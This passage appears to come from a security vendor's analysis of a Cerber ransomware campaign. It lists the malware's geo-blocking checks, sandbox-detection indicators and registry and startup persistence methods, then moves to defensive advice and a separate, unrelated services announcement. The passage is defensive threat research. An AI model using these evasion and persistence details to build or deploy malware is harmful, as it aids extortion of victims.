In some cases it is as simple as needing to get files back, but in
other instances a victim may feel coerced or even intimidated. We
noticed these tactics being used in this campaign, where the victim is
shown the message in Figure 2 upon being infected with Cerber.
Figure 2. A message to the victim after encryption
The ransomware authors attempt to incentivize the victim into paying
quickly by providing a 50 percent discount if the ransom is paid
within a certain timeframe, as seen in Figure 3.
Figure 3. Ransom offered to victim, which is
discounted for five days
As seen in Figure 4, the Cerber ransomware presented its message and
instructions in 12 different languages, indicating this attack was on
a global scale.
Figure 4. Interface provided to the victim to
pay ransom supports 12 languages
Cerber targets 294 different file extensions for encryption,
including .doc (typically Microsoft Word documents), .ppt (generally
Microsoft PowerPoint slideshows), .jpg and other images. It also
targets financial file formats such as. ibank (used with certain
personal finance management software) and .wallet (used for Bitcoin).
Selective targeting was used in this campaign. The attackers were
observed checking the country code of a host machine’s public IP
address against a list of blacklisted countries in the JSON
configuration, utilizing online services such as ipinfo.io to verify
the information. Blacklisted (protected) countries include:
Armenia, Azerbaijan, Belarus, Georgia, Kyrgyzstan, Kazakhstan,
Moldova, Russia, Turkmenistan, Tajikistan, Ukraine, and Uzbekistan.
The attack also checked a system's keyboard layout to further ensure
it avoided infecting machines in the attackers geography:
1049—Russian, ¨ 1058—Ukrainian, 1059—Belarusian, 1064—Tajik,
1067—Armenian, 1068—Azeri, (Latin), 1079—Georgian, 1087—Kazakh,
1088—Kyrgyz (Cyrillic), 1090—Turkmen, 1091—Uzbek (Latin),
2072—Romanian (Moldova), 2073—Russian (Moldova), 2092—Azeri
(Cyrillic), 2115—Uzbek (Cyrillic).
Selective targeting has historically been used to keep malware from
infecting endpoints within the author’s geographical region, thus
protecting them from the wrath of local authorities. The actor also
controls their exposure using this technique. In this case, there is
reason to suspect the attackers are based in Russia or the surrounding region.
Anti VM Checks
The malware searches for a series of hooked modules, specific
filenames and paths, and known sandbox volume serial numbers,
including: sbiedll.dll, dir_watch.dll, api_log.dll, dbghelp.dll,
Frz_State, C:\popupkiller.exe, C:\stimulator.exe,
C:\TOOLS\execute.exe, \sand-box\, \cwsandbox\, \sandbox\, 0CD1A40,
6CBBC508, 774E1682, 837F873E, 8B6F64BC.
Aside from the aforementioned checks and blacklisting, there is also
a wait option built in where the payload will delay execution on an
infected machine before it launches an encryption routine. This
technique was likely implemented to further avoid detection within
Once executed, Cerber deploys the following persistence techniques
to make sure a system remains infected:
A registry key is added to launch the malware instead of the
screensaver when the system becomes idle.
“CommandProcessor” Autorun keyvalue is changed to point to the
Cerber payload so that the malware will be launched each time the
Windows terminal, “cmd.exe”, is launched.
A shortcut (.lnk)
file is added to the startup folder. This file references the
ransomware and Windows will execute the file immediately after the
infected user logs in.
Common persistence methods such as
run and runonce key are also used.
A Solid Defense
Mitigating ransomware malware has become a high priority for
affected organizations because passive security technologies such as
signature-based containment have proven ineffective.
Malware authors have demonstrated an ability to outpace most endpoint
controls by compiling multiple variations of their malware with minor
binary differences. By using alternative packers and compilers,
authors are increasing the level of effort for researchers and
reverse-engineers. Unfortunately, those efforts don’t scale.
Disabling support for macros in documents from the Internet and
increasing user awareness are two ways to reduce the likelihood of
infection. If you can, consider blocking connections to websites you
haven’t explicitly whitelisted. However, these controls may not be
sufficient to prevent all infections or they may not be possible based
on your organization.
FireEye Endpoint Security with Exploit Guard
helps to detect exploits and techniques used by ransomware attacks
(and other threat activity) during execution and provides analysts
with greater visibility. This helps your security team conduct more
detailed investigations of broader categories of threats. This
information enables your organization to quickly stop threats and
adapt defenses as needed.
Ransomware has become an increasingly common and effective attack
affecting enterprises, impacting productivity and preventing users
from accessing files and data.
Mitigating the threat of ransomware requires strong endpoint
controls, and may include technologies that allow security personnel
to quickly analyze multiple systems and correlate events to identify
and respond to threats.
HX with Exploit Guard uses behavioral
intelligence to accelerate this process, quickly analyzing endpoints
within your enterprise and alerting your team so they can conduct an
investigation and scope the compromise in real-time.
Traditional defenses don’t have the granular view required to do
this, nor can they connect the dots of discreet individual processes
that may be steps in an attack. This takes behavioral intelligence
that is able to quickly analyze a wide array of processes and alert on
them so analysts and security teams can conduct a complete
investigation into what has, or is, transpiring. This can only be done
if those professionals have the right tools and the visibility into
all endpoint activity to effectively find every aspect of a threat and
deal with it, all in real-time. Also, at FireEye, we go one step ahead
and contact relevant authorities to bring down these types of campaigns.
for more information about Exploit Guard technology.
Every day at Mandiant we respond to some of the largest cyber
security incidents around the world. This gives us a front-row seat
to witness what works (and what doesn't) when it comes to finding
attackers and preventing them from stealing our clients' data.
Attackers' tactics and motives are evolving and as a result our
security strategies also need to adapt. Today, we announced two new service offerings that
will further help our clients improve their protective, detective,
and responsive security controls and leverage Mandiant's extensive
experience responding to some of the most serious cyber security
Our first new service offering addresses attackers'
expanding motives. We are starting to see attackers with destructive
motives and what could be more damaging than attacking a nation's
critical infrastructure. Security incidents at critical
infrastructure such as electric power grids, utilities and
manufacturing companies can affect the lives of hundreds of
thousands of people. Our new Industrial Control Systems (ICS) Security Gap
Assessment is specifically focused on helping these industries -
and others that use SCADA systems - to assess their existing
security processes for industrial control systems. The service helps
identify security GAPs and provides specific recommendations to
close those GAPs and safeguard critical infrastructure.
second new service offering is designed to help organizations
address the challenges they face as they build out their own
internal security operations program and incident response teams.
Many organizations want to enhance their internal capabilities
beyond the traditional security operations centers (SOCs). Our new
Cyber Defense Center Development service helps
organizations evolve their internal SOC by improving the visibility
(monitoring and detection) and response capabilities (incident
response) necessary to defend against advanced threats. This service
looks at existing people, process, and technologies and identifies
areas for improvement. It helps companies to identify and prioritize
the alerts that require the most immediate action with the goal to
reduce the mean time to remediation.
If either of these new
services sound like something that could help your organization let us